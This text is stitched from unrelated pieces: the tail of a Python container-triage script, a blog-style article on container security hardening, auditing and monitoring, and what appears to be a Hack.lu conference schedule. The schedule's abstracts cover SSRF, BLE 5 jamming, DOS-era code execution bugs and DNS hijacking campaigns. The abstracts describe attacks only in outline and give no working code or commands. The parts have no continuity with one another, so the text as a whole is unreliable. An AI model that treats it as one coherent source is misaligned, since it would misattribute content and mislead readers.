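]

if __name__ == "__main__":
    for entry in triage(SAMPLE_CONTAINERS):
        print(f"{entry['level']:5} {entry['score']:3} {entry['name']}")
```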

Container security

The security of a container is not limited to the container itself. A container is based on an image, which contains all the files required to run. But what if the image used is vulnerable, has configuration defects or embedded clear-text secrets, or contains embedded malware intended to do something other than its initial purpose?

Container images are usually stored in a central location because they are easy to control, reuse and share across the community. Do we trust those registries, and are we sure that the connection to those registries is secure?

Orchestration tools are great for managing containers. They pull images from registries, deploy images into containers and manage the running containers. But is it always clearly defined who has access and who does not? Do we trust the orchestrator node in the cluster? Is the network traffic between containers properly separated in the orchestrator configuration?

Multiple containers share the same OS kernel instance. Each operating system has a container runtime, which coordinates different OS components in such a way that each container sees only its dedicated resources and is isolated from the other containers running at the same time. Anyone with root access on the host can see and access all containers. The attack surface on the host OS is pretty big: an attacker can attempt to exploit host OS vulnerabilities, tamper with file systems or gain privileged user access rights.

Hardening

When you think about hardening a container, you have to take into consideration all the components that make a container up and running. And as there is no single, concrete security measure for containers, we have to find measures to harden every component.
We will present best practices for each component.

Container Images Security

  • use only signed images from a trusted registry
  • visibility into all layers of the image
  • validation of the configuration of the images, regular patching updates
  • constant monitoring

Host Security

  • harden the host
  • always patch
  • grant authorization wisely, by controlling user access
  • separate partitions for containers
  • audit all the container's activity

Container Runtime Security

  • namespaces - what a container can see and to what extent it can interact with other containers internally
  • cgroups - how much of shared kernel and system resources a container will consume
  • seccomp - secure computing mode
  • process restrictions
  • device and file restrictions

Orchestration environment security

  • limit direct access
  • fine-grained-access control rules
  • administrative boundaries
  • resource quota
  • safe management and distribution of secrets
  • encrypt data exchange

Auditing

It is important to continuously scan your containers for vulnerabilities of various kinds, including bugs, inadequate authentication and authorization, embedded secrets and misconfiguration.
Auditing containers can be challenging, on one side because of their architecture and on the other because of the short lifetime and the density of the containers deployed. It becomes really difficult to track what exactly was deployed.

On your host, audit the regular Linux file system and system calls, and also log who is running the container service. Add audit rules for the container service using auditd.
Also make sure you have a container-native log collection agent on your host, which provides automatic collection and processing of container logs.

Monitoring

Monitoring your container activity is essential for identifying security incidents and providing audit trails.
Containerised environments require logging at multiple layers - the host, the container orchestrator and the container itself:

  • monitor and capture host logs
  • monitor the container orchestration system used, like Docker Swarm, Kubernetes, Apache Mesos and HashiCorp Nomad
  • ensure adequate log information at the container level, by setting the log level in your container

Tools

There are different tools out there which might help you in monitoring your containerised environment, but this is not done easily.

  • Docker remote API - the Docker Engine client provides an API through which you can collect basic monitoring data on Docker containers
  • Container Advisor (cAdvisor) - it consists of a container which can collect, process, aggregate and export information related to running containers
  • Prometheus - a monitoring tool that can be used to observe metrics and raise alerts, based on the alerting rules applied over the input data. Everything can be displayed in a UI dashboard based on Grafana

Conclusion

Micro-services are the future, they say. A sure thing for cyber-criminals! As those technologies will be used more and more, and most probably in the cloud, SOC teams need to start worrying about the potential impact and how to face these new threats. It will take time. Oh, and we did not speak about serverless services like AWS Lambda...

Talks
Europe
11:15
11:15
45min
spispy: opensource SPI flash emulation
Trammell Hudson

spispy is an open source hardware tool for emulating SPI flash chips that makes firmware development and boot security research easier. In this talk we'll discuss the challenges of interfacing with the SPI bus and emulating SPI devices, demonstrate how to use it to quickly debug issues with coreboot, and show how we used spispy to discover a critical class of TOCTOU vulnerabilities in secure boot systems like Intel BootGuard.

Talks
Europe
13:15
13:15
180min
Intro to Dark Arts: Getting Started with CTFs
Geethna T K, Shruti Dixit, Sowmya

This workshop will introduce the participants to the world of CTF contests as a way to learn real-world security skills. It will provide them with the basic knowledge for playing CTFs and show how to get started with solving hands-on challenges in the domains of Cryptography, Reverse Engineering and Binary Exploitation. The workshop will consist of hands-on sessions for each of the domains mentioned above to help participants get familiarised with the tools and libraries for each corresponding domain.

Cryptography is the art of disguising confidential data from eavesdroppers and making it accessible only to the authorized parties. It is built on number theory, a branch of pure mathematics devoted primarily to the study of integers.
Reverse Engineering mainly includes understanding assembly language and reversing obfuscated Linux binaries. The attendees will get to learn about the usage of tools such as GDB and Ghidra for dynamic analysis and IDA for static analysis.
Binary Exploitation is the art of ripping binaries apart in order to find vulnerabilities and exploit them to spawn a shell on the server. The session will cover topics ranging from basic buffer overflows to overwriting return addresses and defeating ASLR.

Workshops
Fischbach
13:15
180min
Introduction to WHIDS an Open Source Endpoint Detection System for Windows
Quentin JEROME

WHIDS is one of the first open source endpoint detection solutions for Windows designed with fast Incident Response in mind. It comes with a powerful rule definition format known as Gene, allowing one to achieve complex detection primitives. One of its strengths compared to other approaches is that it dumps artifacts (process, file, registry) based on the criticality of the events detected. This allows one to collect artifacts as close as possible to the alert generated. This approach considerably shortens the incident response process while putting the focus on artifact analysis automation.

The purpose of this workshop will be twofold. In the first place I will introduce the tool and the rule definition format (30 to 45 mins). In the second part some hands-on work with the attendees will be done (the rest of the time). The first part of the hands-on will cover simple WHIDS deployment and tweaking. Then comes a realistic case study. First we will study a technique (or a piece of malware) common to everyone and walk through all the steps leading to the final rule creation. Then the attendees will study on their own a technique or malware sample of their choice and build the appropriate detection rule(s). In the last part we will discuss possible implementations in a production environment.

Workshops
DieKirch-Echternach
13:15
45min
Piercing the Veil: Server Side Request Forgery attacks on Internal Networks.
Alyssa Herrera

I demonstrate a successful attack on a cloud-based US Defense website, gaining access to a sensitive internal network, enumeration of internal services, out-of-band data leakage and attack vectors unique to cloud architecture. Additionally I will discuss mitigation points for server side request forgery, how this type of vulnerability can manifest, what this type of attack is, and how I'm able to legally hack the Department of U.S. Defense.

Talks
Europe
13:15
180min
Practical Incident Response, With Automation and Collaboration Inside
Saad Kadhi

Investigating cyberattacks is now the norm, instead of the exception. The threat landscape keeps changing at a worrying pace while security analysts have to deal with growing complexity, learn new technologies and continuously adapt to rapidly evolving IT environments.

To ease their burden and enable them to give the best of themselves in order to fulfil their important mission, while avoiding the so-called analyst fatigue, they should not be asked to master copying and pasting between different tools and interfaces to get their job done. They should not be asked to follow procedures without clearly understanding them and contributing to their improvement.

Humans have brains, even if the deafening speeches about artificial intelligence and machine learning would want us to believe otherwise. It’s more than time to place humans back at the centre and offer them solutions that get out of their way yet support them in their incident response journey, to learn, adapt, and collaborate at every stage. We are social animals after all, aren’t we?

This is exactly what the MISP Project and TheHive Project are all about: providing not only free, open source products to sustain the daily activities of blue teams around the globe, but products that actually work and integrate with one another to cover the full spectrum of incident response, ranging from detection to recovery and cyber threat intelligence production and sharing.

So come join us for three hours of practical incident response where automation and collaboration play a paramount role, using MISP, the de facto standard for threat sharing, TheHive, a Security Incident Response Platform and Cortex, a powerful analysis and active response engine.

Workshops
Hollenfels
14:00
14:00
45min
Defeating Bluetooth Low Energy 5 PRNG for fun and jamming
Damien Cauquil

Bluetooth Low Energy version 5 was published in late 2016, but we still have no sniffer supporting this specific version (and not that many compatible devices either). The problem is that this new version introduces a new channel hopping algorithm that renders previous sniffing tools useless, as devices can no longer be attacked and connections analyzed. This new algorithm is based on a brand new pseudo-random number generator (PRNG) to provide better collision avoidance, while kicking out all of our good old sniffing tools.

Unless some random hacker manages to break this not-that-strong PRNG and upgrades his BLE sniffing tool to support this algorithm ;). In this talk, we will explain why this PRNG is vulnerable and how it can be easily defeated to sniff and jam communications between two BLE 5 devices. A new version of BtleJack will be released during this talk, providing an efficient way to sniff BLE 5 connections to our fellow IoT hacker family.

Talks
Europe
15:15
15:15
45min
DOS Software Security: Is there Anyone Left to Patch a 25-year old Vulnerability?
Alexandre Bartel

Abstract. DOS (Disk Operating System) systems were developed in the 1970s and are still used today, for example in some embedded systems, management applications or by the gaming community. In this article we will study the impact of the (lack of) security of DOS applications on modern systems. We will explain in detail the vulnerability CVE-2018-20343, which affects the Build Engine - a 3D engine - and which allows arbitrary code execution. We show that such vulnerabilities can be found in seconds using state-of-the-art fuzzers. Often, running a DOS application today means running it within an emulator such as DOSBox. Such emulators should limit the interaction between the DOS application and the host OS. Unfortunately, we also show how DOSBox directly allows emulated applications to access the host file system, thus allowing them to compromise the host machine by changing login scripts, for instance. While this kind of attack usually requires a user action (login, reboot, etc.) to execute the malicious code, we further show, by explaining CVE-2019-12594, that even immediate arbitrary code execution can be achieved by bypassing mitigation techniques such as DEP or ASLR. Finally, we will describe how software vendors are (or are not) patching such vulnerabilities in DOS applications they still sell today.

Talks
Europe
16:00
16:00
45min
DNS On Fire
Rascagneres Paul, Warren Mercer

Cisco Talos has identified malicious actors successfully targeting the DNS protocol for the past several years. In this presentation, we will present 2 threat actors we have been tracking.

The first one developed a piece of malware, named DNSpionage, targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect the targets' DNS records and discovered some SSL certificates registered for them. We identified multiple countries targeted by this redirection. On 22 January 2019, the US DHS published a directive concerning this attack vector. In this presentation, we will present the timeline for these events and their technical details.

The second actor is behind the campaign we named "Sea Turtle". This actor is more advanced and more aggressive than the previous one. They do not hesitate to directly target registrars and even one registry. The talk will present the 2 actors and the methodology used to target the victims.

Talks
Europe
16:45
16:45
15min
CTF Prizes
Hack.lu

Winners of the CTF

Europe